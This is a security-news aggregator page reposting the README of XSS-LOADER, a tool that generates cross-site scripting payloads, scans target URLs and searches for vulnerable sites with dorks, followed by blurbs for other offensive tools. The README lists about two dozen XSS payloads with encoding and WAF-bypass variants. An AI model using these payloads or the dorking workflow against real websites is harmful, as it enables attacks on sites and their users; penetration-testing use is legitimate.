TSEC NEWS: 06.05.21 Cron-Job Fehlerhaft nach PHP Update + PWA mobile + Desktop / 04.05.21 - Android App von TSECURITY 28.04.21 - NEUER SERVER // 26.04.21 ++ Download the Electron-App für tsecurity.de // Über 550 Feed-Quellen

❈ XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder

IT Security Nachrichten feedproxy.google.com

Written by Hulya Karabag
Instagram: Hulya Karabag


How to use

Read Me
  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter


Installation with requirements.txt
git clone https://github.com/capture0x/XSS-LOADER/
pip3 install -r requirements.txt

python3 payloader.py


*Basic Payload
Sets default parameter to :<script>alert(1)</script>

*Div Payload
Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload
Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload
Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload
Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload
Encodes payload writed by user

*Payload Generator Parameter
Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> &lt;script&gt;alert(1)&lt;/script&gt;
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 1 2. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^ Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 30. EXIT

*Xss Scanner
Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list
  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder
First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email [email protected]
Copyright 2020


Kompletten Artikel lesen (externe Quelle: http://feedproxy.google.com/~r/PentestTools/~3/4Q8ciQPdm90/xss-loader-xss-payload-generator-xss.html)

Zur Startseite

➤ Weitere Beiträge von Team Security | IT Sicherheit (tsecurity.de)

XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder

vom 699.5 Punkte
All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDERWritten by Hulya KarabagInstagram: Hulya KarabagScreenshotsHow to useRead MeThis tool creates payload for use in xss injectionSelect default payload tags from parameter or write your paylo

Docker-Inurlbr - Advanced Search In Search Engines, Enables Analysis Provided To Exploit GET / POST Capturing Emails & Urls

vom 689.17 Punkte
Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.How to buildgit clone https://github.com/gmdutra/docker-inurlbr.gitc

XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool

vom 514.27 Punkte
XSpear is XSS Scanner on ruby gemsKey featuresPattern matching based XSS scanningDetect alert confirm prompt event on headless browser (with Selenium)Testing request/response for XSS protection bypass and reflected(or all) paramsReflected ParamsAll params(f

Donut - Generates X86, X64, Or AMD64+x86 Position-Independent Shellcode That Loads .NET Assemblies, PE Files, And Other Windows Payloads From Memory

vom 504.78 Punkte
Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where

Pentest Tools Framework - A Database Of Exploits, Scanners And Tools For Penetration Testing

vom 450.3 Punkte
Pentest Tools Framework is a database of exploits, Scanners and tools for penetration testing. Pentest is a powerful framework includes a lot of tools for beginners. You can explore kernel vulnerabilities, network vulnerabilities.NEWS Modules PTF UPDATEPTF OPtions

Generator-Burp-Extension - Everything You Need About Burp Extension Generation

vom 418.3 Punkte
Everything You Need About Burp Extension GenerationInstallationFirst, install Yeoman and generator-burp-extension using npm (we assume you have pre-installed node.js).npm install -g yonpm install -g generator-burp-extensionThen generate your new project:yo burp-exte

Go-Dork - The Fastest Dork Scanner Written In Go

vom 389.45 Punkte
The fastest dork scanner written in Go. There are also various search engines supported by go-dork, including Google, Shodan, Bing, Duck, Yahoo and Ask. Install Download a prebuilt binary from releases page, unpack and run! or If you have go compiler

Iblessing - An iOS Security Exploiting Toolkit, It Mainly Includes Application Information Collection, Static Analysis And Dynamic Analysis

vom 380.04 Punkte
iblessingiblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis.iblessing is based on unicorn engine and capstone engine.FeaturesCross-platform: Tested on macOS and Ubuntu. iOS App st

Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers

vom 377.07 Punkte
A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting.WeaponsType Name DescriptionArmy-Knife/ALL BurpSuite the BurpSuite project Army-Knife/SCAN jaeles The Swiss Army knife for automated Web Application Testing Army

Pixload - Image Payload Creating/Injecting Tools

vom 366.75 Punkte
Set of tools for creating/injecting payload into images.SETUPThe following Perl modules are required:- GD- Image::ExifTool- String::CRC32On Debian-based systems install these packages:sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

ScareCrow - Payload Creation Framework Designed Around EDR Bypass

vom 339.37 Punkte
If you want to learn more about the techniques utlized in this framework please take a look at Part 1 and Part 2Description ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, utilizing a technique to flush an EDR’s hook out the

Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

vom 318.91 Punkte
NOTE: Never upload payloads to online checkersGraffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding: Python Perl Batch Powershell PHP Bash Graffiti will also a

Team Security Diskussion über XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder